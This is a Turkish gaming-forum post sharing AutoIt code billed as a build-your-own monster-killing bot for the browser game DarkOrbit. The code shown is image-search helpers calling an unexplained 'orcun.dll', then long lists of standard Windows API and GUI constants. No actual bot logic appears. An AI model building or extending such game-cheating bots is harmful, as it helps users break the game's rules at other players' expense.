Forum Zero - Türkiyenin En İyi Online Oyun Forumu

   


Go Back   Forum Zero - Türkiyenin En İyi Online Oyun Forumu > Tarayıcı Tabanlı Oyunlar > DarkOrBit > Darkorbit Botlar ve Buglar


Yaratık kesen Pala botu Kodları Kendi Botunuzu Yapınız.

Darkorbit Botlar ve Buglar


Cevapla
 
LinkBack Seçenekler Arama Stil
Alt 12 Mayıs 2013   #1
Banned
Avatar Yok
Üye Profil Bilgileri
Üyelik tarihi: 24 Kasım 2012
Alter: 27
Mesajlar: 1.095
Konular: 432
Rep Puanı: 148
Rep Gücü: 0
Rep Derecesi : ramorecai will become famous soon enoughramorecai will become famous soon enough
Aldığı Teşekkürler: 32
Ettiği Teşekkürler: 5
Standart Yaratık kesen Pala botu Kodları Kendi Botunuzu Yapınız.

RAMORECAİ GERİ DÖNDÜ VE KODLARDA GELDİ

Kod:
    
Kod:
    Func _imagesearch($findimage, $resultposition, ByRef $x, ByRef $y, $tolerance)
	Return _imagesearcharea($findimage, $resultposition, 0, 0, @DesktopWidth, @DesktopHeight, $x, $y, $tolerance)
EndFunc

Func _imagesearcharea($findimage, $resultposition, $x1, $y1, $right, $bottom, ByRef $x, ByRef $y, $tolerance)
	If $tolerance > 0 Then $findimage = "*" & $tolerance & " " & $findimage
	$result = DllCall("orcun.dll", "str", "ImageSearch", "int", $x1, "int", $y1, "int", $right, "int", $bottom, "str", $findimage)
	If $result[0] = "0" Then Return 0
	$array = StringSplit($result[0], "|")
	$x = Int(Number($array[2]))
	$y = Int(Number($array[3]))
	If $resultposition = 1 Then
		$x = $x + Int(Number($array[4]) / 2)
		$y = $y + Int(Number($array[5]) / 2)
	EndIf
	Return 1
EndFunc

Func _waitforimagesearch($findimage, $waitsecs, $resultposition, ByRef $x, ByRef $y, $tolerance)
	$waitsecs = $waitsecs * 1000
	$starttime = TimerInit()
	While TimerDiff($starttime) < $waitsecs
		Sleep(100)
		$result = _imagesearch($findimage, $resultposition, $x, $y, $tolerance)
		If $result > 0 Then
			Return 1
		EndIf
	WEnd
	Return 0
EndFunc

Func _waitforimagessearch($findimage, $waitsecs, $resultposition, ByRef $x, ByRef $y, $tolerance)
	$waitsecs = $waitsecs * 1000
	$starttime = TimerInit()
	While TimerDiff($starttime) < $waitsecs
		For $i = 1 To $findimage[0]
			Sleep(100)
			$result = _imagesearch($findimage[$i], $resultposition, $x, $y, $tolerance)
			If $result > 0 Then
				Return $i
			EndIf
		Next
	WEnd
	Return 0
EndFunc

Global Const $lbs_notify = 1
Global Const $lbs_sort = 2
Global Const $lbs_noredraw = 4
Global Const $lbs_multiplesel = 8
Global Const $lbs_ownerdrawfixed = 16
Global Const $lbs_ownerdrawvariable = 32
Global Const $lbs_hasstrings = 64
Global Const $lbs_usetabstops = 128
Global Const $lbs_nointegralheight = 256
Global Const $lbs_multicolumn = 512
Global Const $lbs_wantkeyboardinput = 1024
Global Const $lbs_extendedsel = 2048
Global Const $lbs_disablenoscroll = 4096
Global Const $lbs_nodata = 8192
Global Const $lbs_nosel = 16384
Global Const $lbs_combobox = 32768
Global Const $lbs_standard = 3
Global Const $lb_err = -1
Global Const $lb_errattribute = -3
Global Const $lb_errrequired = -4
Global Const $lb_errspace = -2
Global Const $lb_addstring = 384
Global Const $lb_insertstring = 385
Global Const $lb_deletestring = 386
Global Const $lb_selitemrangeex = 387
Global Const $lb_resetcontent = 388
Global Const $lb_setsel = 389
Global Const $lb_setcursel = 390
Global Const $lb_getsel = 391
Global Const $lb_getcursel = 392
Global Const $lb_gettext = 393
Global Const $lb_gettextlen = 394
Global Const $lb_getcount = 395
Global Const $lb_selectstring = 396
Global Const $lb_dir = 397
Global Const $lb_gettopindex = 398
Global Const $lb_findstring = 399
Global Const $lb_getselcount = 400
Global Const $lb_getselitems = 401
Global Const $lb_settabstops = 402
Global Const $lb_gethorizontalextent = 403
Global Const $lb_sethorizontalextent = 404
Global Const $lb_setcolumnwidth = 405
Global Const $lb_addfile = 406
Global Const $lb_settopindex = 407
Global Const $lb_getitemrect = 408
Global Const $lb_getitemdata = 409
Global Const $lb_setitemdata = 410
Global Const $lb_selitemrange = 411
Global Const $lb_setanchorindex = 412
Global Const $lb_getanchorindex = 413
Global Const $lb_setcaretindex = 414
Global Const $lb_getcaretindex = 415
Global Const $lb_setitemheight = 416
Global Const $lb_getitemheight = 417
Global Const $lb_findstringexact = 418
Global Const $lb_setlocale = 421
Global Const $lb_getlocale = 422
Global Const $lb_setcount = 423
Global Const $lb_initstorage = 424
Global Const $lb_itemfrompoint = 425
Global Const $lb_multipleaddstring = 433
Global Const $lb_getlistboxinfo = 434
Global Const $lbn_errspace = -2
Global Const $lbn_selchange = 1
Global Const $lbn_dblclk = 2
Global Const $lbn_selcancel = 3
Global Const $lbn_setfocus = 4
Global Const $lbn_killfocus = 5
Global Const $__listboxconstant_ws_border = 8388608
Global Const $__listboxconstant_ws_vscroll = 2097152
Global Const $gui_ss_default_list = BitOR($lbs_sort, $__listboxconstant_ws_border, $__listboxconstant_ws_vscroll, $lbs_notify)
Global Const $ddl_archive = 32
Global Const $ddl_directory = 16
Global Const $ddl_drives = 16384
Global Const $ddl_exclusive = 32768
Global Const $ddl_hidden = 2
Global Const $ddl_readonly = 1
Global Const $ddl_readwrite = 0
Global Const $ddl_system = 4
Global Const $gui_event_close = -3
Global Const $gui_event_minimize = -4
Global Const $gui_event_restore = -5
Global Const $gui_event_maximize = -6
Global Const $gui_event_primarydown = -7
Global Const $gui_event_primaryup = -8
Global Const $gui_event_secondarydown = -9
Global Const $gui_event_secondaryup = -10
Global Const $gui_event_mousemove = -11
Global Const $gui_event_resized = -12
Global Const $gui_event_dropped = -13
Global Const $gui_rundefmsg = "GUI_RUNDEFMSG"
Global Const $gui_avistop = 0
Global Const $gui_avistart = 1
Global Const $gui_aviclose = 2
Global Const $gui_checked = 1
Global Const $gui_indeterminate = 2
Global Const $gui_unchecked = 4
Global Const $gui_dropaccepted = 8
Global Const $gui_nodropaccepted = 4096
Global Const $gui_acceptfiles = $gui_dropaccepted
Global Const $gui_show = 16
Global Const $gui_hide = 32
Global Const $gui_enable = 64
Global Const $gui_disable = 128
Global Const $gui_focus = 256
Global Const $gui_nofocus = 8192
Global Const $gui_defbutton = 512
Global Const $gui_expand = 1024
Global Const $gui_ontop = 2048
Global Const $gui_fontitalic = 2
Global Const $gui_fontunder = 4
Global Const $gui_fontstrike = 8
Global Const $gui_dockauto = 1
Global Const $gui_dockleft = 2
Global Const $gui_dockright = 4
Global Const $gui_dockhcenter = 8
Global Const $gui_docktop = 32
Global Const $gui_dockbottom = 64
Global Const $gui_dockvcenter = 128
Global Const $gui_dockwidth = 256
Global Const $gui_dockheight = 512
Global Const $gui_docksize = 768
Global Const $gui_dockmenubar = 544
Global Const $gui_dockstatebar = 576
Global Const $gui_dockall = 802
Global Const $gui_dockborders = 102
Global Const $gui_gr_close = 1
Global Const $gui_gr_line = 2
Global Const $gui_gr_bezier = 4
Global Const $gui_gr_move = 6
Global Const $gui_gr_color = 8
Global Const $gui_gr_rect = 10
Global Const $gui_gr_ellipse = 12
Global Const $gui_gr_pie = 14
Global Const $gui_gr_dot = 16
Global Const $gui_gr_pixel = 18
Global Const $gui_gr_hint = 20
Global Const $gui_gr_refresh = 22
Global Const $gui_gr_pensize = 24
Global Const $gui_gr_nobkcolor = -2
Global Const $gui_bkcolor_default = -1
Global Const $gui_bkcolor_transparent = -2
Global Const $gui_bkcolor_lv_alternate = -33554432
Global Const $gui_ws_ex_parentdrag = 1048576
Global Const $gmem_fixed = 0
Global Const $gmem_moveable = 2
Global Const $gmem_nocompact = 16
Global Const $gmem_nodiscard = 32
Global Const $gmem_zeroinit = 64
Global Const $gmem_modify = 128
Global Const $gmem_discardable = 256
Global Const $gmem_not_banked = 4096
Global Const $gmem_share = 8192
Global Const $gmem_ddeshare = 8192
Global Const $gmem_notify = 16384
Global Const $gmem_lower = 4096
Global Const $gmem_valid_flags = 32626
Global Const $gmem_invalid_handle = 32768
Global Const $gptr = $gmem_fixed + $gmem_zeroinit
Global Const $ghnd = $gmem_moveable + $gmem_zeroinit
Global Const $mem_commit = 4096
Global Const $mem_reserve = 8192
Global Const $mem_top_down = 1048576
Global Const $mem_shared = 134217728
Global Const $page_noaccess = 1
Global Const $page_readonly = 2
Global Const $page_readwrite = 4
Global Const $page_execute = 16
Global Const $page_execute_read = 32
Global Const $page_execute_readwrite = 64
Global Const $page_guard = 256
Global Const $page_nocache = 512
Global Const $mem_decommit = 16384
Global Const $mem_release = 32768
Global Const $tagpoint = "struct;long X;long Y;endstruct"
Global Const $tagrect = "struct;long Left;long Top;long Right;long Bottom;endstruct"
Global Const $tagsize = "struct;long X;long Y;endstruct"
Global Const $tagmargins = "int cxLeftWidth;int cxRightWidth;int cyTopHeight;int cyBottomHeight"
Global Const $tagfiletime = "struct;dword Lo;dword Hi;endstruct"
Global Const $tagsystemtime = "struct;word Year;word Month;word Dow;word Day;word Hour;word Minute;word Second;word MSeconds;endstruct"
Global Const $tagtime_zone_information = "struct;long Bias;wchar StdName[32];word StdDate[8];long StdBias;wchar DayName[32];word DayDate[8];long DayBias;endstruct"
Global Const $tagnmhdr = "struct;hwnd hWndFrom;uint_ptr IDFrom;INT Code;endstruct"
Global Const $tagcomboboxexitem = "uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;int SelectedImage;int OverlayImage;" & "int Indent;lparam Param"
Global Const $tagnmcbedragbegin = $tagnmhdr & ";int ItemID;wchar szText[260]"
Global Const $tagnmcbeendedit = $tagnmhdr & ";bool fChanged;int NewSelection;wchar szText[260];int Why"
Global Const $tagnmcomboboxex = $tagnmhdr & ";uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;" & "int SelectedImage;int OverlayImage;int Indent;lparam Param"
Global Const $tagdtprange = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;" & "word MinSecond;word MinMSecond;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;" & "word MaxMinute;word MaxSecond;word MaxMSecond;bool MinValid;bool MaxValid"
Global Const $tagnmdatetimechange = $tagnmhdr & ";dword Flag;" & $tagsystemtime
Global Const $tagnmdatetimeformat = $tagnmhdr & ";ptr Format;" & $tagsystemtime & ";ptr pDisplay;wchar Display[64]"
Global Const $tagnmdatetimeformatquery = $tagnmhdr & ";ptr Format;struct;long SizeX;long SizeY;endstruct"
Global Const $tagnmdatetimekeydown = $tagnmhdr & ";int VirtKey;ptr Format;" & $tagsystemtime
Global Const $tagnmdatetimestring = $tagnmhdr & ";ptr UserString;" & $tagsystemtime & ";dword Flags"
Global Const $tageventlogrecord = "dword Length;dword Reserved;dword RecordNumber;dword TimeGenerated;dword TimeWritten;dword EventID;" & "word EventType;word NumStrings;word EventCategory;word ReservedFlags;dword ClosingRecordNumber;dword StringOffset;" & "dword UserSidLength;dword UserSidOffset;dword DataLength;dword DataOffset"
Global Const $taggdipbitmapdata = "uint Width;uint Height;int Stride;int Format;ptr Scan0;uint_ptr Reserved"
Global Const $taggdipencoderparam = "byte GUID[16];ulong Count;ulong Type;ptr Values"
Global Const $taggdipencoderparams = "uint Count;byte Params[1]"
Global Const $taggdiprectf = "float X;float Y;float Width;float Height"
Global Const $taggdipstartupinput = "uint Version;ptr Callback;bool NoThread;bool NoCodecs"
Global Const $taggdipstartupoutput = "ptr HookProc;ptr UnhookProc"
Global Const $taggdipimagecodecinfo = "byte CLSID[16];byte FormatID[16];ptr CodecName;ptr DllName;ptr FormatDesc;ptr FileExt;" & "ptr MimeType;dword Flags;dword Version;dword SigCount;dword SigSize;ptr SigPattern;ptr SigMask"
Global Const $taggdippencoderparams = "uint Count;byte Params[1]"
Global Const $taghditem = "uint Mask;int XY;ptr Text;handle hBMP;int TextMax;int Fmt;lparam Param;int Image;int Order;uint Type;ptr pFilter;uint State"
Global Const $tagnmhddispinfo = $tagnmhdr & ";int Item;uint Mask;ptr Text;int TextMax;int Image;lparam lParam"
Global Const $tagnmhdfilterbtnclick = $tagnmhdr & ";int Item;" & $tagrect
Global Const $tagnmheader = $tagnmhdr & ";int Item;int Button;ptr pItem"
Global Const $taggetipaddress = "byte Field4;byte Field3;byte Field2;byte Field1"
Global Const $tagnmipaddress = $tagnmhdr & ";int Field;int Value"
Global Const $taglvfindinfo = "struct;uint Flags;ptr Text;lparam Param;" & $tagpoint & ";uint Direction;endstruct"
Global Const $taglvhittestinfo = $tagpoint & ";uint Flags;int Item;int SubItem;int iGroup"
Global Const $taglvitem = "struct;uint Mask;int Item;int SubItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;lparam Param;" & "int Indent;int GroupID;uint Columns;ptr pColumns;ptr piColFmt;int iGroup;endstruct"
Global Const $tagnmlistview = $tagnmhdr & ";int Item;int SubItem;uint NewState;uint OldState;uint Changed;" & "struct;long ActionX;long ActionY;endstruct;lparam Param"
Global Const $tagnmlvcustomdraw = "struct;" & $tagnmhdr & ";dword dwDrawStage;handle hdc;" & $tagrect & ";dword_ptr dwItemSpec;uint uItemState;lparam lItemlParam;endstruct" & ";dword clrText;dword clrTextBk;int iSubItem;dword dwItemType;dword clrFace;int iIconEffect;" & "int iIconPhase;int iPartId;int iStateId;struct;long TextLeft;long TextTop;long TextRight;long TextBottom;endstruct;uint uAlign"
Global Const $tagnmlvdispinfo = $tagnmhdr & ";" & $taglvitem
Global Const $tagnmlvfinditem = $tagnmhdr & ";int Start;" & $taglvfindinfo
Global Const $tagnmlvgetinfotip = $tagnmhdr & ";dword Flags;ptr Text;int TextMax;int Item;int SubItem;lparam lParam"
Global Const $tagnmitemactivate = $tagnmhdr & ";int Index;int SubItem;uint NewState;uint OldState;uint Changed;" & $tagpoint & ";lparam lParam;uint KeyFlags"
Global Const $tagnmlvkeydown = "align 1;" & $tagnmhdr & ";word VKey;uint Flags"
Global Const $tagnmlvscroll = $tagnmhdr & ";int DX;int DY"
Global Const $tagmchittestinfo = "uint Size;" & $tagpoint & ";uint Hit;" & $tagsystemtime & ";" & $tagrect & ";int iOffset;int iRow;int iCol"
Global Const $tagmcmonthrange = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short Span"
Global Const $tagmcrange = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short MinSet;short MaxSet"
Global Const $tagmcselrange = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds"
Global Const $tagnmdaystate = $tagnmhdr & ";" & $tagsystemtime & ";int DayState;ptr pDayState"
Global Const $tagnmselchange = $tagnmhdr & ";struct;word BegYear;word BegMonth;word BegDOW;word BegDay;word BegHour;word BegMinute;word BegSecond;word BegMSeconds;endstruct;" & "struct;word EndYear;word EndMonth;word EndDOW;word EndDay;word EndHour;word EndMinute;word EndSecond;word EndMSeconds;endstruct"
Global Const $tagnmobjectnotify = $tagnmhdr & ";int Item;ptr piid;ptr pObject;long Result;dword dwFlags"
Global Const $tagnmtckeydown = "align 1;" & $tagnmhdr & ";word VKey;uint Flags"
Global Const $tagtvitem = "struct;uint Mask;handle hItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;int SelectedImage;" & "int Children;lparam Param;endstruct"
Global Const $tagtvitemex = "struct;" & $tagtvitem & ";int Integral;uint uStateEx;hwnd hwnd;int iExpandedImage;int iReserved;endstruct"
Global Const $tagnmtreeview = $tagnmhdr & ";uint Action;" & "struct;uint OldMask;handle OldhItem;uint OldState;uint OldStateMask;" & "ptr OldText;int OldTextMax;int OldImage;int OldSelectedImage;int OldChildren;lparam OldParam;endstruct;" & "struct;uint NewMask;handle NewhItem;uint NewState;uint NewStateMask;" & "ptr NewText;int NewTextMax;int NewImage;int NewSelectedImage;int NewChildren;lparam NewParam;endstruct;" & "struct;long PointX;long PointY;endstruct"
Global Const $tagnmtvcustomdraw = "struct;" & $tagnmhdr & ";dword DrawStage;handle HDC;" & $tagrect & ";dword_ptr ItemSpec;uint ItemState;lparam ItemParam;endstruct" & ";dword ClrText;dword ClrTextBk;int Level"
Global Const $tagnmtvdispinfo = $tagnmhdr & ";" & $tagtvitem
Global Const $tagnmtvgetinfotip = $tagnmhdr & ";ptr Text;int TextMax;handle hItem;lparam lParam"
Global Const $tagtvhittestinfo = $tagpoint & ";uint Flags;handle Item"
Global Const $tagnmtvkeydown = "align 1;" & $tagnmhdr & ";word VKey;uint Flags"
Global Const $tagnmmouse = $tagnmhdr & ";dword_ptr ItemSpec;dword_ptr ItemData;" & $tagpoint & ";lparam HitInfo"
Global Const $tagtoken_privileges = "dword Count;align 4;int64 LUID;dword Attributes"
Global Const $tagimageinfo = "handle hBitmap;handle hMask;int Unused1;int Unused2;" & $tagrect
Global Const $tagmenuinfo = "dword Size;INT Mask;dword Style;uint YMax;handle hBack;dword ContextHelpID;ulong_ptr MenuData"
Global Const $tagmenuiteminfo = "uint Size;uint Mask;uint Type;uint State;uint ID;handle SubMenu;handle BmpChecked;handle BmpUnchecked;" & "ulong_ptr ItemData;ptr TypeData;uint CCH;handle BmpItem"
Global Const $tagrebarbandinfo = "uint cbSize;uint fMask;uint fStyle;dword clrFore;dword clrBack;ptr lpText;uint cch;" & "int iImage;hwnd hwndChild;uint cxMinChild;uint cyMinChild;uint cx;handle hbmBack;uint wID;uint cyChild;uint cyMaxChild;" & "uint cyIntegral;uint cxIdeal;lparam lParam;uint cxHeader;" & $tagrect & ";uint uChevronState"
Global Const $tagnmrebarautobreak = $tagnmhdr & ";uint uBand;uint wID;lparam lParam;uint uMsg;uint fStyleCurrent;bool fAutoBreak"
Global Const $tagnmrbautosize = $tagnmhdr & ";bool fChanged;" & "struct;long TargetLeft;long TargetTop;long TargetRight;long TargetBottom;endstruct;" & "struct;long ActualLeft;long ActualTop;long ActualRight;long ActualBottom;endstruct"
Global Const $tagnmrebar = $tagnmhdr & ";dword dwMask;uint uBand;uint fStyle;uint wID;lparam lParam"
Global Const $tagnmrebarchevron = $tagnmhdr & ";uint uBand;uint wID;lparam lParam;" & $tagrect & ";lparam lParamNM"
Global Const $tagnmrebarchildsize = $tagnmhdr & ";uint uBand;uint wID;" & "struct;long CLeft;long CTop;long CRight;long CBottom;endstruct;" & "struct;long BLeft;long BTop;long BRight;long BBottom;endstruct"
Global Const $tagcolorscheme = "dword Size;dword BtnHighlight;dword BtnShadow"
Global Const $tagnmtoolbar = $tagnmhdr & ";int iItem;" & "struct;int iBitmap;int idCommand;byte fsState;byte fsStyle;dword_ptr dwData;int_ptr iString;endstruct" & ";int cchText;ptr pszText;" & $tagrect
Global Const $tagnmtbhotitem = $tagnmhdr & ";int idOld;int idNew;dword dwFlags"
Global Const $tagtbbutton = "int Bitmap;int Command;byte State;byte Style;align;dword_ptr Param;int_ptr String"
Global Const $tagtbbuttoninfo = "uint Size;dword Mask;int Command;int Image;byte State;byte Style;word CX;dword_ptr Param;ptr Text;int TextMax"
Global Const $tagnetresource = "dword Scope;dword Type;dword DisplayType;dword Usage;ptr LocalName;ptr RemoteName;ptr Comment;ptr Provider"
Global Const $tagoverlapped = "ulong_ptr Internal;ulong_ptr InternalHigh;struct;dword Offset;dword OffsetHigh;endstruct;handle hEvent"
Global Const $tagopenfilename = "dword StructSize;hwnd hwndOwner;handle hInstance;ptr lpstrFilter;ptr lpstrCustomFilter;" & "dword nMaxCustFilter;dword nFilterIndex;ptr lpstrFile;dword nMaxFile;ptr lpstrFileTitle;dword nMaxFileTitle;" & "ptr lpstrInitialDir;ptr lpstrTitle;dword Flags;word nFileOffset;word nFileExtension;ptr lpstrDefExt;lparam lCustData;" & "ptr lpfnHook;ptr lpTemplateName;ptr pvReserved;dword dwReserved;dword FlagsEx"
Global Const $tagbitmapinfo = "struct;dword Size;long Width;long Height;word Planes;word BitCount;dword Compression;dword SizeImage;" & "long XPelsPerMeter;long YPelsPerMeter;dword ClrUsed;dword ClrImportant;endstruct;dword RGBQuad"
Global Const $tagblendfunction = "byte Op;byte Flags;byte Alpha;byte Format"
Global Const $tagguid = "ulong Data1;ushort Data2;ushort Data3;byte Data4[8]"
Global Const $tagwindowplacement = "uint length;uint flags;uint showCmd;long ptMinPosition[2];long ptMaxPosition[2];long rcNormalPosition[4]"
Global Const $tagwindowpos = "hwnd hWnd;hwnd InsertAfter;int X;int Y;int CX;int CY;uint Flags"
Global Const $tagscrollinfo = "uint cbSize;uint fMask;int nMin;int nMax;uint nPage;int nPos;int nTrackPos"
Global Const $tagscrollbarinfo = "dword cbSize;" & $tagrect & ";int dxyLineButton;int xyThumbTop;" & "int xyThumbBottom;int reserved;dword rgstate[6]"
Global Const $taglogfont = "long Height;long Width;long Escapement;long Orientation;long Weight;byte Italic;byte Underline;" & "byte Strikeout;byte CharSet;byte OutPrecision;byte ClipPrecision;byte Quality;byte PitchAndFamily;wchar FaceName[32]"
Global Const $tagkbdllhookstruct = "dword vkCode;dword scanCode;dword flags;dword time;ulong_ptr dwExtraInfo"
Global Const $tagprocess_information = "handle hProcess;handle hThread;dword ProcessID;dword ThreadID"
Global Const $tagstartupinfo = "dword Size;ptr Reserved1;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;" & "dword YCountChars;dword FillAttribute;dword Flags;word ShowWindow;word Reserved2;ptr Reserved3;handle StdInput;" & "handle StdOutput;handle StdError"
Global Const $tagsecurity_attributes = "dword Length;ptr Descriptor;bool InheritHandle"
Global Const $tagwin32_find_data = "dword dwFileAttributes;dword ftCreationTime[2];dword ftLastAccessTime[2];dword ftLastWriteTime[2];dword nFileSizeHigh;dword nFileSizeLow;dword dwReserved0;dword dwReserved1;wchar cFileName[260];wchar cAlternateFileName[14]"
Global Const $tagtextmetric = "long tmHeight;long tmAscent;long tmDescent;long tmInternalLeading;long tmExternalLeading;" & "long tmAveCharWidth;long tmMaxCharWidth;long tmWeight;long tmOverhang;long tmDigitizedAspectX;long tmDigitizedAspectY;" & "wchar tmFirstChar;wchar tmLastChar;wchar tmDefaultChar;wchar tmBreakChar;byte tmItalic;byte tmUnderlined;byte tmStruckOut;" & "byte tmPitchAndFamily;byte tmCharSet"
Global Const $process_terminate = 1
Global Const $process_create_thread = 2
Global Const $process_set_sessionid = 4
Global Const $process_vm_operation = 8
Global Const $process_vm_read = 16
Global Const $process_vm_write = 32
Global Const $process_dup_handle = 64
Global Const $process_create_process = 128
Global Const $process_set_quota = 256
Global Const $process_set_information = 512
Global Const $process_query_information = 1024
Global Const $process_suspend_resume = 2048
Global Const $process_all_access = 2035711
Global Const $error_no_token = 1008
Global Const $se_assignprimarytoken_name = "SeAssignPrimaryTokenPrivilege"
Global Const $se_audit_name = "SeAuditPrivilege"
Global Const $se_backup_name = "SeBackupPrivilege"
Global Const $se_change_notify_name = "SeChangeNotifyPrivilege"
Global Const $se_create_global_name = "SeCreateGlobalPrivilege"
Global Const $se_create_pagefile_name = "SeCreatePagefilePrivilege"
Global Const $se_create_permanent_name = "SeCreatePermanentPrivilege"
Global Const $se_create_token_name = "SeCreateTokenPrivilege"
Global Const $se_debug_name = "SeDebugPrivilege"
Global Const $se_enable_delegation_name = "SeEnableDelegationPrivilege"
Global Const $se_impersonate_name = "SeImpersonatePrivilege"
Global Const $se_inc_base_priority_name = "SeIncreaseBasePriorityPrivilege"
Global Const $se_increase_quota_name = "SeIncreaseQuotaPrivilege"
Global Const $se_load_driver_name = "SeLoadDriverPrivilege"
Global Const $se_lock_memory_name = "SeLockMemoryPrivilege"
Global Const $se_machine_account_name = "SeMachineAccountPrivilege"
Global Const $se_manage_volume_name = "SeManageVolumePrivilege"
Global Const $se_prof_single_process_name = "SeProfileSingleProcessPrivilege"
Global Const $se_remote_shutdown_name = "SeRemoteShutdownPrivilege"
Global Const $se_restore_name = "SeRestorePrivilege"
Global Const $se_security_name = "SeSecurityPrivilege"
Global Const $se_shutdown_name = "SeShutdownPrivilege"
Global Const $se_sync_agent_name = "SeSyncAgentPrivilege"
Global Const $se_system_environment_name = "SeSystemEnvironmentPrivilege"
Global Const $se_system_profile_name = "SeSystemProfilePrivilege"
Global Const $se_systemtime_name = "SeSystemtimePrivilege"
Global Const $se_take_ownership_name = "SeTakeOwnershipPrivilege"
Global Const $se_tcb_name = "SeTcbPrivilege"
Global Const $se_unsolicited_input_name = "SeUnsolicitedInputPrivilege"
Global Const $se_undock_name = "SeUndockPrivilege"
Global Const $se_privilege_enabled_by_default = 1
Global Const $se_privilege_enabled = 2
Global Const $se_privilege_removed = 4
Global Const $se_privilege_used_for_access = -2147483648
Global Const $se_group_mandatory = 1
Global Const $se_group_enabled_by_default = 2
Global Const $se_group_enabled = 4
Global Const $se_group_owner = 8
Global Const $se_group_use_for_deny_only = 16
Global Const $se_group_integrity = 32
Global Const $se_group_integrity_enabled = 64
Global Const $se_group_resource = 536870912
Global Const $se_group_logon_id = -1073741824
Global Enum $tokenprimary = 1, $tokenimpersonation
Global Enum $securityanonymous = 0, $securityidentification, $securityimpersonation, $securitydelegation
Global Enum $tokenuser = 1, $tokengroups, $tokenprivileges, $tokenowner, $tokenprimarygroup, $tokendefaultdacl, $tokensource, $tokentype, $tokenimpersonationlevel, $tokenstatistics, $tokenrestrictedsids, $tokensessionid, $tokengroupsandprivileges, $tokensessionreference, $tokensandboxinert, $tokenauditpolicy, $tokenorigin, $tokenelevationtype, $tokenlinkedtoken, $tokenelevation, $tokenhasrestrictions, $tokenaccessinformation, $tokenvirtualizationallowed, $tokenvirtualizationenabled, $tokenintegritylevel, $tokenuiaccess, $tokenmandatorypolicy, $tokenlogonsid
Global Const $token_assign_primary = 1
Global Const $token_duplicate = 2
Global Const $token_impersonate = 4
Global Const $token_query = 8
Global Const $token_query_source = 16
Global Const $token_adjust_privileges = 32
Global Const $token_adjust_groups = 64
Global Const $token_adjust_default = 128
Global Const $token_adjust_sessionid = 256
Global Const $token_all_access = 983551
Global Const $token_read = 131080
Global Const $token_write = 131296
Global Const $token_execute = 131072
Global Const $token_has_traverse_privilege = 1
Global Const $token_has_backup_privilege = 2
Global Const $token_has_restore_privilege = 4
Global Const $token_has_admin_group = 8
Global Const $token_is_restricted = 16
Global Const $token_session_not_referenced = 32
Global Const $token_sandbox_inert = 64
Global Const $token_has_impersonate_privilege = 128
Global Const $rights_delete = 65536
Global Const $read_control = 131072
Global Const $write_dac = 262144
Global Const $write_owner = 524288
Global Const $synchronize = 1048576
Global Const $standard_rights_required = 983040
Global Const $standard_rights_read = $read_control
Global Const $standard_rights_write = $read_control
Global Const $standard_rights_execute = $read_control
Global Const $standard_rights_all = 2031616
Global Const $specific_rights_all = 65535
Global Enum $not_used_access = 0, $grant_access, $set_access, $deny_access, $revoke_access, $set_audit_success, $set_audit_failure
Global Enum $trustee_is_unknown = 0, $trustee_is_user, $trustee_is_group, $trustee_is_domain, $trustee_is_alias, $trustee_is_well_known_group, $trustee_is_deleted, $trustee_is_invalid, $trustee_is_computer
Global Const $logon_with_profile = 1
Global Const $logon_netcredentials_only = 2
Global Enum $sidtypeuser = 1, $sidtypegroup, $sidtypedomain, $sidtypealias, $sidtypewellknowngroup, $sidtypedeletedaccount, $sidtypeinvalid, $sidtypeunknown, $sidtypecomputer, $sidtypelabel
Global Const $sid_administrators = "S-1-5-32-544"
Global Const $sid_users = "S-1-5-32-545"
Global Const $sid_guests = "S-1-5-32-546"
Global Const $sid_account_operators = "S-1-5-32-548"
Global Const $sid_server_operators = "S-1-5-32-549"
Global Const $sid_print_operators = "S-1-5-32-550"
Global Const $sid_backup_operators = "S-1-5-32-551"
Global Const $sid_replicator = "S-1-5-32-552"
Global Const $sid_owner = "S-1-3-0"
Global Const $sid_everyone = "S-1-1-0"
Global Const $sid_network = "S-1-5-2"
Global Const $sid_interactive = "S-1-5-4"
Global Const $sid_system = "S-1-5-18"
Global Const $sid_authenticated_users = "S-1-5-11"
Global Const $sid_schannel_authentication = "S-1-5-64-14"
Global Const $sid_digest_authentication = "S-1-5-64-21"
Global Const $sid_nt_service = "S-1-5-80"
Global Const $sid_untrusted_mandatory_level = "S-1-16-0"
Global Const $sid_low_mandatory_level = "S-1-16-4096"
Global Const $sid_medium_mandatory_level = "S-1-16-8192"
Global Const $sid_medium_plus_mandatory_level = "S-1-16-8448"
Global Const $sid_high_mandatory_level = "S-1-16-12288"
Global Const $sid_system_mandatory_level = "S-1-16-16384"
Global Const $sid_protected_process_mandatory_level = "S-1-16-20480"
Global Const $sid_secure_process_mandatory_level = "S-1-16-28672"
Global Const $sid_all_services = "S-1-5-80-0"

Func _winapi_getlasterror($curerr = @error, $curext = @extended)
	Local $aresult = DllCall("kernel32.dll", "dword", "GetLastError")
	Return SetError($curerr, $curext, $aresult[0])
EndFunc

Func _winapi_setlasterror($ierrcode, $curerr = @error, $curext = @extended)
	DllCall("kernel32.dll", "none", "SetLastError", "dword", $ierrcode)
	Return SetError($curerr, $curext)
EndFunc

Global Const $fc_nooverwrite = 0
Global Const $fc_overwrite = 1
Global Const $ft_modified = 0
Global Const $ft_created = 1
Global Const $ft_accessed = 2
Global Const $fo_read = 0
Global Const $fo_append = 1
Global Const $fo_overwrite = 2
Global Const $fo_binary = 16
Global Const $fo_unicode = 32
Global Const $fo_utf16_le = 32
Global Const $fo_utf16_be = 64
Global Const $fo_utf8 = 128
